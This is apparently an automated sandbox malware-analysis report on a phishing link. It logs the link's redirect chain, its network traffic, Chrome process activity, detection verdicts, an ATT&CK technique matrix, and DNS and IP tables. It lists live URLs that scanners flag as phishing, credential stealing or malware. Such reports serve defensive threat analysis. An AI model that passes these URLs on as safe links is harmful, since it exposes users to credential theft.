Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8Content-Length: 1Connection: closeDate: Mon, 23 Dec 2024 14:21:30 GMTx-envoy-response-flags: -Server: Clearbitstrict-transport-security: max-age=63072000; includeSubDomains; preloadx-content-type-options: nosniffX-Cache: Error from cloudfrontVia: 1.1 c5be8caec2de3502cf9672040e52189a.cloudfront.net (CloudFront)X-Amz-Cf-Pop: BAH53-C1X-Amz-Cf-Id: aMlXCY6niTkTtC956scnq-mhgmc_CI8NJUGJHvVQxH11PUwU9jHLrw==
Source: chromecache_84.2.dr, chromecache_80.2.drString found in binary or memory: http://www.opensource.org/licenses/mit-license.php)
Source: chromecache_84.2.dr, chromecache_80.2.drString found in binary or memory: https://fingerprint.com)
Source: chromecache_77.2.drString found in binary or memory: https://fontawesome.com
Source: chromecache_77.2.drString found in binary or memory: https://fontawesome.com/license/free
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: classification engineClassification label: mal64.win@19/40@30/12
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2324 --field-trial-handle=2232,i,8424609447750284658,8407064920144454549,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://mandrillapp.com/track/click/30363981/app.salesforceiq.com?p=eyJzIjoiQ21jNldfVTIxTkdJZi1NQzQ1SGE3SXJFTW1RIiwidiI6MSwicCI6IntcInVcIjozMDM2Mzk4MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2FwcC5zYWxlc2ZvcmNlaXEuY29tXFxcL3I_dD1BRndoWmYwNjV0QlFRSnRiMVFmd1A1dC0tMHZnQkowaF9lYklFcTVLRlhTWHFVWmFpNUo4RlFTd1dycTkzR1FPbEFuczlLREd2VzRJQ2Z2eGo4WjVDSkQxUTlXdDVvME5XNWMwY0tIaXpVQWJ1YnBhT2dtS2pjVkxkaDFZWE8ybklsdFRlb2VQZ2dVTCZ0YXJnZXQ9NjMxZjQyMGVlZDEzY2EzYmNmNzdjMzI0JnVybD1odHRwczpcXFwvXFxcL21haW4uZDNxczBuMG9xdjNnN28uYW1wbGlmeWFwcC5jb21cIixcImlkXCI6XCI5ZTdkODJiNWQ0NzA0YWVhYTQ1ZjkxY2Y0ZTFmNGRiMFwiLFwidXJsX2lkc1wiOltcImY5ODQ5NWVhMjMyYTgzNjg1ODUxN2Y4ZTRiOTVjZjg4MWZlODExNmJcIl19In0"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2324 --field-trial-handle=2232,i,8424609447750284658,8407064920144454549,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation2
Browser Extensions
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder
1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://mandrillapp.com/track/click/30363981/app.salesforceiq.com?p=eyJzIjoiQ21jNldfVTIxTkdJZi1NQzQ1SGE3SXJFTW1RIiwidiI6MSwicCI6IntcInVcIjozMDM2Mzk4MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2FwcC5zYWxlc2ZvcmNlaXEuY29tXFxcL3I_dD1BRndoWmYwNjV0QlFRSnRiMVFmd1A1dC0tMHZnQkowaF9lYklFcTVLRlhTWHFVWmFpNUo4RlFTd1dycTkzR1FPbEFuczlLREd2VzRJQ2Z2eGo4WjVDSkQxUTlXdDVvME5XNWMwY0tIaXpVQWJ1YnBhT2dtS2pjVkxkaDFZWE8ybklsdFRlb2VQZ2dVTCZ0YXJnZXQ9NjMxZjQyMGVlZDEzY2EzYmNmNzdjMzI0JnVybD1odHRwczpcXFwvXFxcL21haW4uZDNxczBuMG9xdjNnN28uYW1wbGlmeWFwcC5jb21cIixcImlkXCI6XCI5ZTdkODJiNWQ0NzA0YWVhYTQ1ZjkxY2Y0ZTFmNGRiMFwiLFwidXJsX2lkc1wiOltcImY5ODQ5NWVhMjMyYTgzNjg1ODUxN2Y4ZTRiOTVjZjg4MWZlODExNmJcIl19In00%Avira URL Cloudsafe
https://mandrillapp.com/track/click/30363981/app.salesforceiq.com?p=eyJzIjoiQ21jNldfVTIxTkdJZi1NQzQ1SGE3SXJFTW1RIiwidiI6MSwicCI6IntcInVcIjozMDM2Mzk4MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2FwcC5zYWxlc2ZvcmNlaXEuY29tXFxcL3I_dD1BRndoWmYwNjV0QlFRSnRiMVFmd1A1dC0tMHZnQkowaF9lYklFcTVLRlhTWHFVWmFpNUo4RlFTd1dycTkzR1FPbEFuczlLREd2VzRJQ2Z2eGo4WjVDSkQxUTlXdDVvME5XNWMwY0tIaXpVQWJ1YnBhT2dtS2pjVkxkaDFZWE8ybklsdFRlb2VQZ2dVTCZ0YXJnZXQ9NjMxZjQyMGVlZDEzY2EzYmNmNzdjMzI0JnVybD1odHRwczpcXFwvXFxcL21haW4uZDNxczBuMG9xdjNnN28uYW1wbGlmeWFwcC5jb21cIixcImlkXCI6XCI5ZTdkODJiNWQ0NzA0YWVhYTQ1ZjkxY2Y0ZTFmNGRiMFwiLFwidXJsX2lkc1wiOltcImY5ODQ5NWVhMjMyYTgzNjg1ODUxN2Y4ZTRiOTVjZjg4MWZlODExNmJcIl19In0100%SlashNextCredential Stealing type: Phishing & Social Engineering
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://fingerprint.com)0%Avira URL Cloudsafe
https://5mzcue1v.doc.checkiteasy.com/favicon.ico0%Avira URL Cloudsafe
https://5mzcue1v.doc.checkiteasy.com/image/logo.png0%Avira URL Cloudsafe
https://5mzcue1v.doc.checkiteasy.com/tracker.php0%Avira URL Cloudsafe
https://main.d3qs0n0oqv3g7o.amplifyapp.com/100%Avira URL Cloudmalware
https://6p205g.ar.yourtaskforce.com/favicon.ico100%Avira URL Cloudphishing
https://6p205g.ar.yourtaskforce.com/?_js=_1100%Avira URL Cloudphishing
https://5mzcue1v.doc.checkiteasy.com/script.js0%Avira URL Cloudsafe
https://6p205g.ar.yourtaskforce.com/?_jd=botd100%Avira URL Cloudphishing
https://5mzcue1v.doc.checkiteasy.com/style.css0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
d26p066pn2w0s0.cloudfront.net
13.227.8.64
truefalse
    high
    ipapi.co
    172.67.69.226
    truefalse
      high
      mandrillapp.com
      15.197.175.4
      truefalse
        high
        cdnjs.cloudflare.com
        104.17.24.14
        truefalse
          high
          www.google.com
          142.250.181.68
          truefalse
            high
            api.ipify.org
            104.26.12.205
            truefalse
              high
              main.d3qs0n0oqv3g7o.amplifyapp.com
              13.227.8.104
              truefalse
                unknown
                5mzcue1v.doc.checkiteasy.com
                135.225.111.190
                truetrue
                  unknown
                  6p205g.ar.yourtaskforce.com
                  135.225.111.190
                  truetrue
                    unknown
                    apiq-apiv1-06027f9a-pb-48692342.us-west-2.elb.amazonaws.com
                    44.226.126.181
                    truefalse
                      unknown
                      app.salesforceiq.com
                      unknown
                      unknownfalse
                        high
                        logo.clearbit.com
                        unknown
                        unknownfalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          https://6p205g.ar.yourtaskforce.com/favicon.icofalse
                          • Avira URL Cloud: phishing
                          unknown
                          https://logo.clearbit.com/undefined?size=400false
                            high
                            https://5mzcue1v.doc.checkiteasy.com/true
                              unknown
                              https://6p205g.ar.yourtaskforce.com/?_js=_1true
                              • Avira URL Cloud: phishing
                              unknown
                              https://6p205g.ar.yourtaskforce.com/?_jd=botdfalse
                              • Avira URL Cloud: phishing
                              unknown
                              https://api.ipify.org/?format=jsonfalse
                                high
                                https://5mzcue1v.doc.checkiteasy.com/image/logo.pngtrue
                                • Avira URL Cloud: safe
                                unknown
                                https://main.d3qs0n0oqv3g7o.amplifyapp.com/false
                                • Avira URL Cloud: malware
                                unknown
                                https://6p205g.ar.yourtaskforce.com/true
                                  unknown
                                  https://app.salesforceiq.com/r?t=AFwhZf065tBQQJtb1QfwP5t--0vgBJ0h_ebIEq5KFXSXqUZai5J8FQSwWrq93GQOlAns9KDGvW4ICfvxj8Z5CJD1Q9Wt5o0NW5c0cKHizUAbubpaOgmKjcVLdh1YXO2nIltTeoePggUL&target=631f420eed13ca3bcf77c324&url=https://main.d3qs0n0oqv3g7o.amplifyapp.comfalse
                                    high
                                    https://5mzcue1v.doc.checkiteasy.com/tracker.phptrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://5mzcue1v.doc.checkiteasy.com/style.csstrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://ipapi.co/json/false
                                      high
                                      https://5mzcue1v.doc.checkiteasy.com/favicon.icotrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.cssfalse
                                        high
                                        https://5mzcue1v.doc.checkiteasy.com/script.jstrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/webfonts/fa-solid-900.woff2false
                                          high
                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://fingerprint.com)chromecache_84.2.dr, chromecache_80.2.drfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://fontawesome.comchromecache_77.2.drfalse
                                            high
                                            http://www.opensource.org/licenses/mit-license.php)chromecache_84.2.dr, chromecache_80.2.drfalse
                                              high
                                              https://fontawesome.com/license/freechromecache_77.2.drfalse
                                                high
                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs
                                                IPDomainCountryFlagASNASN NameMalicious
                                                104.17.24.14
                                                cdnjs.cloudflare.comUnited States
                                                13335CLOUDFLARENETUSfalse
                                                135.225.111.190
                                                5mzcue1v.doc.checkiteasy.comUnited States
                                                10455LUCENT-CIOUStrue
                                                104.26.12.205
                                                api.ipify.orgUnited States
                                                13335CLOUDFLARENETUSfalse
                                                15.197.175.4
                                                mandrillapp.comUnited States
                                                7430TANDEMUSfalse
                                                13.227.8.104
                                                main.d3qs0n0oqv3g7o.amplifyapp.comUnited States
                                                16509AMAZON-02USfalse
                                                104.26.9.44
                                                unknownUnited States
                                                13335CLOUDFLARENETUSfalse
                                                239.255.255.250
                                                unknownReserved
                                                unknownunknownfalse
                                                13.227.8.64
                                                d26p066pn2w0s0.cloudfront.netUnited States
                                                16509AMAZON-02USfalse
                                                142.250.181.68
                                                www.google.comUnited States
                                                15169GOOGLEUSfalse
                                                44.226.126.181
                                                apiq-apiv1-06027f9a-pb-48692342.us-west-2.elb.amazonaws.comUnited States
                                                16509AMAZON-02USfalse
                                                172.67.69.226
                                                ipapi.coUnited States
                                                13335CLOUDFLARENETUSfalse
                                                IP
                                                192.168.2.5
                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1579920
                                                Start date and time:2024-12-23 15:20:04 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 3m 5s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:browseurl.jbs
                                                Sample URL:https://mandrillapp.com/track/click/30363981/app.salesforceiq.com?p=eyJzIjoiQ21jNldfVTIxTkdJZi1NQzQ1SGE3SXJFTW1RIiwidiI6MSwicCI6IntcInVcIjozMDM2Mzk4MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2FwcC5zYWxlc2ZvcmNlaXEuY29tXFxcL3I_dD1BRndoWmYwNjV0QlFRSnRiMVFmd1A1dC0tMHZnQkowaF9lYklFcTVLRlhTWHFVWmFpNUo4RlFTd1dycTkzR1FPbEFuczlLREd2VzRJQ2Z2eGo4WjVDSkQxUTlXdDVvME5XNWMwY0tIaXpVQWJ1YnBhT2dtS2pjVkxkaDFZWE8ybklsdFRlb2VQZ2dVTCZ0YXJnZXQ9NjMxZjQyMGVlZDEzY2EzYmNmNzdjMzI0JnVybD1odHRwczpcXFwvXFxcL21haW4uZDNxczBuMG9xdjNnN28uYW1wbGlmeWFwcC5jb21cIixcImlkXCI6XCI5ZTdkODJiNWQ0NzA0YWVhYTQ1ZjkxY2Y0ZTFmNGRiMFwiLFwidXJsX2lkc1wiOltcImY5ODQ5NWVhMjMyYTgzNjg1ODUxN2Y4ZTRiOTVjZjg4MWZlODExNmJcIl19In0
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:7
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal64.win@19/40@30/12
                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                • Excluded IPs from analysis (whitelisted): 172.217.21.35, 172.217.19.238, 64.233.161.84, 172.217.17.46, 199.232.214.172, 192.229.221.95, 172.217.17.35, 23.218.208.109, 13.107.246.63, 172.202.163.200
                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                • VT rate limit hit for: https://mandrillapp.com/track/click/30363981/app.salesforceiq.com?p=eyJzIjoiQ21jNldfVTIxTkdJZi1NQzQ1SGE3SXJFTW1RIiwidiI6MSwicCI6IntcInVcIjozMDM2Mzk4MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2FwcC5zYWxlc2ZvcmNlaXEuY29tXFxcL3I_dD1BRndoWmYwNjV0QlFRSnRiMVFmd1A1dC0tMHZnQkowaF9lYklFcTVLRlhTWHFVWmFpNUo4RlFTd1dycTkzR1FPbEFuczlLREd2VzRJQ2Z2eGo4WjVDSkQxUTlXdDVvME5XNWMwY0tIaXpVQWJ1YnBhT2dtS2pjVkxkaDFZWE8ybklsdFRlb2VQZ2dVTCZ0YXJnZXQ9NjMxZjQyMGVlZDEzY2EzYmNmNzdjMzI0JnVybD1odHRwczpcXFwvXFxcL21haW4uZDNxczBuMG9xdjNnN28uYW1wbGlmeWFwcC5jb21cIixcImlkXCI6XCI5ZTdkODJiNWQ0NzA0YWVhYTQ1ZjkxY2Y0ZTFmNGRiMFwiLFwidXJsX2lkc1wiOltcImY5ODQ5NWVhMjMyYTgzNjg1ODUxN2Y4ZTRiOTVjZjg4MWZlODExNmJcIl19In0
                                                No simulations
                                                No context
                                                No context
                                                No context
                                                No context
                                                No context
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 23 13:21:02 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                Category:dropped
                                                Size (bytes):2677
                                                Entropy (8bit):3.9667304171328666
                                                Encrypted:false
                                                SSDEEP:48:8bdmTCedHeidAKZdA19ehwiZUklqehey+3:8MnGxy
                                                MD5:6129E3035B30BC3A0DD4690D7FB12118
                                                SHA1:19F4ABA7DB48841F9ECB7D21E8E123D53685A128
                                                SHA-256:8EAE8957831D54FC9ECFF89E7EBA812BA1441DAE2B62204E163E1FC60B178C63
                                                SHA-512:EFDD9382C94B04CDB91117A7341D3AC60DE07973CC8046E82FD7C2E0796BA969E64573E15C811F46200D61896050F6426DD8FC9E94687B20382F7EEFEB8C0143
                                                Malicious:false
                                                Reputation:low
                                                Preview:L..................F.@.. ...$+.,....ap}.EU..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.r....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.r....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.r....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.r..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.r...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............lb......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 23 13:21:02 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                Category:dropped
                                                Size (bytes):2679
                                                Entropy (8bit):3.985955954484175
                                                Encrypted:false
                                                SSDEEP:48:8cdmTCedHeidAKZdA1weh/iZUkAQkqehhy+2:8NnE9Qcy
                                                MD5:A53D6795CF44FFDE613C1F51548AF176
                                                SHA1:70307E90253B3F63F9A2F1845E02EDC6D6BEA143
                                                SHA-256:D0EF13F41F46000947797B750ADC9B225B48B852F51CC1F788D33A40635ECC01
                                                SHA-512:046B349FB4E5ACF36C478FE1E7E730AFB077CBC55F2E0C6D22DA0AA2520CFC685A4B329A0987E1B2786B6774E5CBAFCAC87BD96C63CA4AE699854F6ECA83B2F1
                                                Malicious:false
                                                Reputation:low
